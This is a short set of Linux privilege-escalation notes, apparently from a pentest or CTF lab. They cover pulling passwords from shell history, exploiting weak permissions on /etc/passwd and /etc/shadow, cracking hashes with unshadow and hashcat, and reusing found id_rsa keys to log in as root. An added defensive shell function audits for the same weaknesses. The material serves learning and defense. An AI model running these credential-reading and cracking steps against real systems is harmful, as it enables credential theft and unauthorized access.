Password and file permission
Stored Passwords
history
or
cat .bash_history
will show previous commands and will sometimes leak passwords.
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
Sometimes a simple
ls
or
ls -la
will give interesting files
Weak File permission
Do we have access to files that we shouldn't?
ls -la /etc/passwd
This file used to store passwords
If we can modify the file, we can remove the x, or we could change the group number of our user to become part of the root group
ls -la /etc/shadow
We can copy the content of
/etc/passwd
in a file on our attacking machine. We can then use
unshadow
unshadow passwd shadow
We can then copy this output into another file and keep only the users with a hash
We can now look for the hash on hashcat.net. Our hashes start with
$6$
so we can ctrl+F this, and this will give us the mode number to use.
hashcat -m 1800 unshadowed /usr/share/wordlists/rockyou.txt -O
SSH keys
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null
If we find an id_rsa key, we can copy it to our machine and use it to log in
Before using it we have to change its permissions
chmod 600 id_rsa
And then we can just
ssh -i id_rsa root@10.10.240.48
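A defender-side check for the weaknesses covered on this page (weak /etc/passwd and /etc/shadow permissions, loosely protected SSH keys, passwords left in history files). This is an added example, not part of the original notes; the function name audit_perms, its ROOT argument and the output labels are assumptions made for illustration.

```sh
#!/bin/sh
# Added example, not from the original page. ROOT is a hypothetical prefix so
# the audit can target a mounted image or test tree; empty = live filesystem.

# perms FILE: print the 10-character mode string from ls, e.g. -rw-r--r--
perms() { ls -ld "$1" 2>/dev/null | cut -c1-10; }

audit_perms() {
    root=${1:-}
    # /etc/passwd writable by group or other: any user can edit account entries
    case $(perms "$root/etc/passwd") in
        ?????w????|????????w?) echo "WRITABLE $root/etc/passwd" ;;
    esac
    # /etc/shadow readable by other: password hashes are exposed
    case $(perms "$root/etc/shadow") in
        ???????r??) echo "READABLE $root/etc/shadow" ;;
    esac
    # id_rsa must have no group/other bits; authorized_keys must not be
    # writable by group/other
    find "$root/home" "$root/root" -type f \
        \( -name id_rsa -o -name authorized_keys \) 2>/dev/null |
    while IFS= read -r f; do
        case ${f##*/}:$(perms "$f") in
            id_rsa:????------) ;;
            id_rsa:*) echo "KEY_EXPOSED $f" ;;
            authorized_keys:?????w????|authorized_keys:????????w?)
                echo "WRITABLE $f" ;;
        esac
    done
    # History files mentioning "password": list the file name only (-l) so the
    # audit output does not repeat the secret
    find "$root/home" "$root/root" -type f -name '.*_history' \
        -exec grep -l -i -I "password" {} + 2>/dev/null | sed 's/^/HISTORY_SECRET /'
}
```

Run audit_perms with no argument as root to check the live system; every line it prints is a finding to fix.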